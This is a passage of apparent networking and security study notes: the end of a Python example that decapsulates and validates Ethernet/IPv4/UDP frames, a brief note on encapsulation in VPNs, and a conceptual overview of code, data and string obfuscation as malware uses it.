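    if proto != IPPROTO_UDP:
        raise ValueError("not a UDP datagram")
    udp = ip[ihl:total_len]
    sport, dport, ulen, _ = struct.unpack("!HHHH", udp[:8])
    return {
        "eth": {"src": src_mac.hex(":"), "dst": dst_mac.hex(":")},
        "ip": {"src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst), "ttl": ttl},
        "udp": {"sport": sport, "dport": dport},
        "payload": udp[8:ulen],
    }


def is_valid_frame(frame: bytes) -> bool:
    """True when every layer parses and the IPv4 header checksum verifies."""
    try:
        decapsulate(frame)
        return True
    except (ValueError, struct.error):
        return False


if __name__ == "__main__":
    # Constructed addresses (locally administered MACs, private IPs); not a real capture.
    frame = encapsulate(b"hello", "10.0.0.1", "10.0.0.2", 40000, 53,
                        "02:00:00:00:00:01", "02:00:00:00:00:02")
    print(frame.hex())
    print(decapsulate(frame))
```

Flipping any byte inside the IPv4 header makes the receiver reject the frame at the network layer, which is why each layer validates its own header before handing the inner data upward.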

Use Case in VPN:

- Encapsulation is essential in VPNs (Virtual Private Networks) where a protocol like IPsec
encapsulates data for secure transmission across public networks.

6. Obfuscation

Obfuscation is the process of deliberately making something difficult to understand, often applied to
source code or data in order to hide its true purpose, making it harder for humans or automated
systems to analyze.

Types of Obfuscation:
1. Code Obfuscation:
- Transforming the source code of a program into a format that is difficult to reverse
engineer while retaining its functionality.
- Used by malware authors to prevent detection by security systems and analysts.
2. Data Obfuscation:
- Masking sensitive data such as encryption keys or login credentials within files or
memory to hide them from attackers.
3. String Obfuscation:
- Converting plain text strings (like URLs, commands) into unreadable formats to evade
detection tools or security analysts.

Use in Malware:
- Obfuscation is frequently used by malware to evade antivirus systems by altering the
appearance of its code without changing its behavior. For example, packing the malware or
inserting junk code are common obfuscation techniques.

- Example:
- Encoded PowerShell Command: A common technique used by attackers is to obfuscate
a PowerShell command by encoding it in Base64 to evade detection by static analysis
tools.
